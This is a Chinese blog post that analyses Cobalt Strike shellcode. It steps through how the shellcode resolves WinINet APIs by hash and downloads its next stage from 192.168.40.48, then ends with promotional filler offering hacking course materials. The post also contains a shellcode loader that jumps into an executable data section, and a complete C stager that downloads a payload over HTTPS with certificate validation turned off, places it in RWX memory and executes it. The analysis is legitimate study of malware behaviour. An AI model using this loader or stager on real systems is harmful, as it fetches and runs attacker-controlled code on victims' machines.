Cobalt Strike shellcode分析

最新推荐文章于 2024-05-17 10:45:01 发布

程序员_大白

最新推荐文章于 2024-05-17 10:45:01 发布

阅读量380

点赞数 3

分类专栏：程序员互联网网络安全文章标签：单片机嵌入式硬件

本文链接：https://blog.csdn.net/Python_0011/article/details/138351635

版权

网络安全同时被 3 个专栏收录

329 篇文章 22 订阅

订阅专栏

程序员

304 篇文章 68 订阅

订阅专栏

互联网

218 篇文章 4 订阅

订阅专栏

0x00 分析样本

#include<stdio.h>#include<Windows.h>#pragma comment(linker, "/section:.data,RWE")
unsigned char buf[] = "shellcode";
int main(){    //反调试不是很强的可以用来定位入口点  printf("hell word!!\r\n");     __asm   {    mov eax, offset buf    jmp eax  }}

0x01 分析过程

shellcode入口,开始进行调试

进入0X00D1983F函数，，找到函数后循环都会经过这里push了wininet字符串和0x726774C

进入ebp的call分析

第一次拿的是本身exe

第二次拿的是ntdll.dll

然后拿到ntdll.dll的导出表地址

导出函数个数

然后进行遍历

与0x0726774c进行比较，看是否是需要的函数

最后遍历出来找的是LoadLibrary地址，通过LoadLibrary调用起了wininet.dll

然后遍历拿到 InternetOpenUrlA，并实现调用

再次拿到 InternetConnectA并实现调用，访问ip为“192.168.40.48”

再次拿到HttpOpenRequestA并实现调用网页路径为“/MKMw”

再次拿到InternetSetOptionA并实现调用

再次拿到HttpSendRequestA并实现调用

拿到GetDialogBaseUnits，与上面同理

拿到GetDesktopWindow，与上面同理

拿到InternetFindNextFileA，与上面同理

拿到InternetErrorDlg，与上面同理

拿到VirtualAlloc，与上面同理

拿到InternetReadFile，这是循环在读取

然后放开就直接运行

cs上线

0x02 代码模拟

char* HttpsGet(const char* szURL, const int port, int nSize, char *UA){
  URL_COMPONENTSA crackedURL = { 0 };  char szHostName[128];  char szUrlPath[256];  crackedURL.dwStructSize = sizeof(URL_COMPONENTSA);  crackedURL.lpszHostName = szHostName;  crackedURL.dwHostNameLength = ARRAYSIZE(szHostName);  crackedURL.lpszUrlPath = szUrlPath;  crackedURL.dwUrlPathLength = ARRAYSIZE(szUrlPath);  InternetCrackUrlA(szURL, (DWORD)strlen(szURL), 0, &crackedURL);
  // Start of the internet session  HINTERNET hInternet = InternetOpenA(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
  // HTTPS version  HINTERNET hHttpSession = InternetConnectA(hInternet, crackedURL.lpszHostName, INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);  HINTERNET hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", crackedURL.lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
  DWORD dwFlags;  DWORD dwBuffLen = sizeof(dwFlags);  BOOL bRet = InternetQueryOptionA(hHttpRequest, INTERNET_OPTION_SECURITY_FLAGS, (LPVOID)&dwFlags, &dwBuffLen);
  if (!bRet) {    printf("Failed to query internet options. Error: %d", GetLastError());    return NULL;  }
  dwFlags |= SECURITY_FLAG_IGNORE_UNKNOWN_CA;  dwFlags |= SECURITY_FLAG_IGNORE_CERT_CN_INVALID;  dwFlags |= SECURITY_FLAG_IGNORE_CERT_DATE_INVALID;
  bRet = InternetSetOptionA(hHttpRequest, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof(dwFlags));  if (!bRet) {    printf("Failed to set internet options. Error: %d", GetLastError());    return NULL;  }
  // Send HTTP request  HttpSendRequest(hHttpRequest, NULL, 0, NULL, 0);
  LPVOID p = VirtualAlloc(NULL, 0x400000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  DWORD dwRealWord;
  for (int i = 0; i < 32; i++) {    BOOL response = InternetReadFile(hHttpRequest, (LPVOID)((int)p + i * 0x2000), 0x2000, &dwRealWord);  }
  InternetCloseHandle(hHttpRequest);  InternetCloseHandle(hHttpSession);  InternetCloseHandle(hInternet);
  ((void(WINAPI*)(void))p)();
  return NULL;}

c代码简单模拟，shellcode请求并上线

0x03 成果

`黑客&网络安全如何学习

今天只要你给我的文章点赞，我私藏的网安学习资料一样免费共享给你们，来看看有哪些东西。

1.学习路线图

攻击和防守要学的东西也不少，具体要学的东西我都写在了上面的路线图，如果你能学完它们，你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源，但基本上都残缺不全的，这是我自己录的网安视频教程，上面路线图的每一个知识点，我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等，都是网络安全入门必知必会的学习内容。

（都打包成一块的了，不能一一展开，总共300多集）

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

程序员_大白

关注

3
点赞
踩
5

收藏

觉得还不错? 一键收藏
0
评论
Cobalt Strike shellcode分析

内容概要：包括内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的，包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点，电子书也有200多本，由于内容的敏感性，我就不一一展示了。网上虽然也有很多的学习资源，但基本上都残缺不全的，这是我自己录的网安视频教程，上面路线图的每一个知识点，我都有配套的视频讲解。
复制链接

扫一扫